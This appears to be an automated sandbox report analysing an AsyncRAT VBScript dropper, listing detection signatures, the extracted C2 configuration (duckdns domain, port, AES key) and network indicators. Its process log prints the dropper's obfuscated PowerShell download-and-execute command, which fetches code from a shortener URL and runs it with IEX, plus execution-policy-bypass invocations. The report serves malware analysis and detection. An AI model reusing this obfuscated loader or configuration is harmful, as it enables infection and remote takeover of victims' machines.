Windows Analysis Report KDH32783JHC73287SDF87.VBS

Overview

General Information

Sample Name: KDH32783JHC73287SDF87.VBS
Analysis ID: 490264
MD5: 51bada4133b4400a6f7acac7e67695af
SHA1: 53d9b24ac41d2c5b5452c004797a9aff04a64487
SHA256: 14670db63054f493d6b33519e1eab9caf1dd1576999ffedf775d19119c0d78e2
Tags: AsyncRATvbs
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Antivirus detection for dropped file
Yara detected Powershell download and execute
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
Bypasses PowerShell execution policy
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sigma detected: Suspicious PowerShell Command Line
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Obfuscated command line found
Creates an undocumented autostart registry key
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: WScript or CScript Dropper
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Csc.exe Source File Folder
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Stores large binary data to the registry
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Found malware configuration
Source: 27.2.RegAsm.exe.400000.0.unpack Malware Configuration Extractor: AsyncRAT {"Server": "mo1010.duckdns.org", "Ports": "1010", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "cavQVZf7osGMKDDytqZ6EDmJ5n2UgBk8", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAJAz27qyWIi2FmYH0D0HHzANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwOTIwMDI0MzI0WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJNaTvGiSjKlfmPMVTEXQRetARCxvzPtIPxBZ9Q7itx0EVPNWU7CdxUz+G/SN+FykW26xzCu01Dbyual0D/9YHN8gKEmYkbVMABjLotY74Qfl0JEyx+GlU8Q/tAb1P2ywVy+JLoEmXm0KCRszRz9+ccqPli/NF1B0kZNdDMIPi5l+6/K5DvfgWwZ+esMu17wvo8iHm2YET4W5fcKJ/wKJd/uucvfZ9olryj8TT7BgoFwQiZuua2xaw5oMtzYvn/rqdGqvu4kc8HJS+c8DKGs25wy4xjxQNGBWszfSwiPliySmUUuXWMXX5EsCvxt62nB/T0fhn8RCbHEFKhcdVwhvwiX/Aqt5ebXggxLwuxRKdLIAJC4WzMLCVtoMltj4u5OdAF7qr2gQp92ULR2QSsTqOiBDBIkahPyAbJnvqOWX6yCDbo/iLzuxADMgJuqhIOkCBMag5+Cla84NtCgcXqinga2T1Wk8DlXBK4UNXbDFu2TY0tOMkr5c8QCfeALlNUDe72iZLchMa+acJQd4zXWgzsPV5gdgXn+EXbiFxHCQ320SygPP3sArTXkVMe1/cYpQY36t3Xsx8/jsZvDSch2NePjJa+hPXgoBvzLW/KdHpyKJ/nH0NJFjCoiND/2OViZ2FYGACOdNYjai3+d04MJpKJ4DsAKCWUs14MvImV/WK3pAgMBAAGjMjAwMB0GA1UdDgQWBBR+g5E8J076qCzjsnkVylHLdWvsSjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+kuRXiVE2XGsQDVfs9FTnwnJ6B/w7uowYKG5x3+jR+botdt49Dzd9hqRTetVqpRo4SvPiav8F1k/P5pC5R0afEIQl5OkLOXYx4n8Pq9Sh6TThKgyerb1zv1bqZfyCLAidx2wM4yLCadkkqKhXTrI/YZBkvHtKn1cUEVTQi8MXphAZMQFxlhdNYc04+592zFJnatx+M/gVAA7fAHF/dMmzm06k783xt/K6SxQC4NQ5yXV5DTyCbTVAMOOLFZlJIz67nN7FUFUtQ02SMTxh8yMICDyMopnhJyOhx/1cDNklOzco87JectaL+vDJ12/P1sywLrCWhduaB+ngYfXPJRhyeHbSLty4O+D+p3tmpmWy0D5NHWk4TFy0Tt9VXGtV8U2DDAlikKyZiAAN6nz0xB+NZ05mp0kyqB7C2q7OnZlkNH+jO+CDL/VhXlq7yfQwDxQ93NoS6cqGqqYNQvyNeIjaTxmMWowHM4QpszbCEbdksOPuvrOtAwwpLLgz62fkcbNN/2VRZkG6c36eU6avlD/dr4uYB3ou9Bk6hGQA1+Tw9JkfG8TAr2vC9YFqide9P1CGF3xQvo5G7/6RDN8H0zsaXmjsS9umY9wm2eEf0sprbHuwf+z6IpaVOWGyIdXY8ePVVJyL6mhLPsoqengpwRUl9+pizfeTWJ6oygud6DbRHw==", "ServerSignature": "A/n28mlKHRpABn1XleVu2B5EJNcUIcSJ1NVH/qHFhyP3VRxiHDxHzv19Tc5gU9jMlePSW3WyYs0Qbt6JOLVMZ1Vwse1JgI6CJlkb6Mu2Umrpd1CULO9yUF94eR8KvgsFrwiH1PeHtLOa2QaTEy6tZXWH+m3kPiCvBAh2GQporTqGbIWqxAKtu/7roMmhPw/75o4ml0o7B5x6CB0B6iwvLyRbG7EiCq1KnludEJQLWdOzQOcIzStkRtOiBjFIgLuqM6OfJYKO3ZhEXRzpkznk5t9id2kQn01446/1hxFl1LMl+2fQSvv6cW9lTykckSFd6qjlKoLC31A1WfOO0CsY4xEvSDGaHGNu43u+rvPfgrGBwufkbGHKrO4hM4kOjtnj+tCOKnIYC74xwq58jIs5xgmhUIHTwolDzyuD/KKrOuvk/WaZmgQw2OelUza+aWJxagH2jSKbAdKG/y7bovupy0+sxzgyB98UjoIHY9aKtVsvrL23IdG6w6huoXGqjHOlWBCZYSJ7Dgzkv6h/N1F2dRrQ378E+wuOnN058wNnBfku+u7uPBaFusF5kCYVHg01vRvGKJFZaXx++we4eJ3a3B2tdBYDdL18D70dxP6gRn+5JUGGIAM1kmO2wWxXgx7hO4HhARMbZew2L9L3X8u4Yx3dbRisGb9B8P5Vt3NeTF4=", "Group": "Default"}
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vfl4qio1\vfl4qio1.dll Avira: detection malicious, Label: HEUR/AGEN.1138338
Antivirus or Machine Learning detection for unpacked file
Source: 27.2.RegAsm.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.139.125:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.66.125:443 -> 192.168.2.6:49738 version: TLS 1.0
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256f source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: yDictionary`2<Module>System.IOCosturamscorlibSystem.Collections.GenericReadThreadLoadAddisAttachedInterlockedcostura.entrypointdll.pdb.compressedcostura.entrypointdll.dll.compressedSynchronizeddefaultInstancesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleget_NameGetNamerequestedAssemblyNamefullnameTypeget_Cultureset_CultureresourceCulturecultureApplicationSettingsBaseDisposeEditorBrowsableStateWriteSTAThreadAttributeCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteTryGetValuevalueadd_AssemblyResolveFodyTest.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachget_LengthEndsWithnullCacheLockSystem.ComponentModelEntryPointDllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemresourceManMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.ConfigurationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonRunCopyToget_CultureInfoSleepAssemblyLoadersenderget_ResourceManagerResolveEventHandlerSystem.CodeDom.CompilerEnter.ctor.cctorMonitorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcesReadFromEmbeddedResourcesFodyTest.Properties.Resources.resourcesDebuggingModesGetAssembliesFodyTest.PropertiesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsSettingsResolveEventArgsEqualsFormatObjectExitget_DefaultToLowerInvariantFodyTestProcessedByFodyContainsKeyget_AssemblyResolveAssemblyReadExistingAssemblyGetExecutingAssemblyEntryIsNullOrEmpty;FodyTest.Properties.Resources source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.455396279.000001F46A6B3000.00000004.00000001.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp
Source: Binary string: $costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: costura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: EntryPointDll.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: entrypointdllIcostura.entrypointdll.dll.compressedIcostura.entrypointdll.pdb.compressed source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Public\FodyTest\FodyTest\obj\Debug\FodyTest.pdb source: powershell.exe, 00000002.00000002.440119822.000001F400F00000.00000004.00000001.sdmp
Source: Binary string: omation.pdb@ source: powershell.exe, 00000002.00000002.455681360.000001F46A718000.00000004.00000001.sdmp
Source: Binary string: c:\dev\sqlite\dotnet\obj\2010\System.Data.SQLite.2010\Release\System.Data.SQLite.pdb source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 77.247.127.198:1010 -> 192.168.2.6:49746
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: mo1010.duckdns.org
Uses dynamic DNS services
Source: unknown DNS query: name: mo1010.duckdns.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg HTTP/1.1Host: java-eg.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg HTTP/1.1Host: java-eg.com
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.139.125:443 -> 192.168.2.6:49736 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.66.125:443 -> 192.168.2.6:49738 version: TLS 1.0
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49746 -> 77.247.127.198:1010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: powershell.exe, 00000002.00000002.439146366.000001F400D86000.00000004.00000001.sdmp String found in binary or memory: http://chilp.it
Source: powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.439117897.000001F400D82000.00000004.00000001.sdmp String found in binary or memory: http://chilp.it/7854610
Source: powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp String found in binary or memory: http://chilp.itx
Source: powershell.exe, 00000002.00000002.454545582.000001F46A350000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.482653968.00000160DC160000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.484137137.00000160DC6A5000.00000004.00000001.sdmp String found in binary or memory: http://crl.miV
Source: powershell.exe, 0000000A.00000002.484137137.00000160DC6A5000.00000004.00000001.sdmp String found in binary or memory: http://crl.micros
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.27.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 0000001B.00000003.484202985.0000000005651000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5a49a674e05d4
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000002.00000002.439192366.000001F400DA0000.00000004.00000001.sdmp String found in binary or memory: http://java-eg.com
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.456438717.00000160C4088000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.430280365.000001F400001000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.454457728.00000160C3D11000.00000004.00000001.sdmp, RegAsm.exe, 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.456438717.00000160C4088000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854610
Source: powershell.exe, 00000002.00000002.438233615.000001F400C89000.00000004.00000001.sdmp String found in binary or memory: https://chilp.it/7854610X
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.431058587.000001F400210000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.447667519.000001F401AD9000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.439146366.000001F400D86000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/i1.jpg
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg
Source: powershell.exe, 00000002.00000002.433057897.000001F40041C000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.433154001.000001F400439000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com/wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg
Source: powershell.exe, 00000002.00000002.433589282.000001F4005B6000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.com8
Source: powershell.exe, 00000002.00000002.433170103.000001F40043F000.00000004.00000001.sdmp String found in binary or memory: https://java-eg.comx
Source: powershell.exe, 00000002.00000002.450198666.000001F410062000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp String found in binary or memory: https://system.data.sqlite.org/
Source: RegAsm.exe, 0000001B.00000002.891515046.0000000006F80000.00000004.00020000.sdmp String found in binary or memory: https://system.data.sqlite.org/X
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: RegAsm.exe, 0000001B.00000002.890605007.0000000004271000.00000004.00000001.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: chilp.it
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/php.jpg HTTP/1.1Host: java-eg.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/themes/twentyseventeen/template-parts/header/java/i2.jpg HTTP/1.1Host: java-eg.com
Source: global traffic HTTP traffic detected: GET /7854610 HTTP/1.1Host: chilp.itConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected AsyncRAT
Source: Yara match File source: 27.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.886169058.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.888448368.0000000003161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5644, type: MEMORYSTR

System Summary:

barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' '
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Command $CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary);$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters;$CompilerParametres.ReferencedAssemblies.Add('System.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Management.dll');$CompilerParametres.ReferencedAssemblies.Add('System.Windows.Forms.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.ReferencedAssemblies.Add('Microsoft.VisualBasic.dll');$CompilerParametres.IncludeDebugInformation = $false;$CompilerParametres.GenerateExecutable = $false;$CompilerParametres.GenerateInMemory = $true;$c1='(New-';[System.Threading.Thread]::Sleep(1000);$X1 = '!!!!!!!!!!!! '.Replace('!!!!!!!!!!!!','Object');[System.Threading.Thread]::Sleep(1000);$X2 = 'Net';[System.Threading.Thread]::Sleep(1000);$X3 = '.We';[System.Threading.Thread]::Sleep(1000);$c4='.Downlo';[System.Threading.Thread]::Sleep(1000);$D1 = 'bClient)';[System.Threading.Thread]::Sleep(1000);$c3='adString(''h'+'t'+'t'+'p'+'s:/'+'/c'+'h'+'i'+'lp'+'.i'+'t'+'/7'+'8'+'54'+'6'+'1'+'0'')';[System.Threading.Thread]::Sleep(1000);$alosh = $c1,$X1,$X2,$X3,$D1,$c4,$c3;[System.Threading.Thread]::Sleep(1000);$hcnx = 'I`E`X';[System.Threading.Thread]::Sleep(1000);$zzzzzzzzzzzzzzzzzzzzzzzzzzzzz= $hcnx+($alosh -Join '')|I`E`X Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\run.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Music\vb.bat' ' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass C:\Users\Public\Music\alosh.ps1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\WindowsStateRepositoryCore.bat' '
Yara signature match
Source: Process Memory Space: powershell.exe PID: 6616, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD03C15059 2_2_00007FFD03C15059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD03C154A0 2_2_00007FFD03C154A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD03CE45E2 2_2_00007FFD03CE45E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_05FB8580 27_2_05FB8580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_05FB8571 27_2_05FB8571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_05FB2CC8 27_2_05FB2CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_05FB4880 27_2_05FB4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_05FB4871 27_2_05FB4871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 27_2_071FDF08 27_2_071FDF08
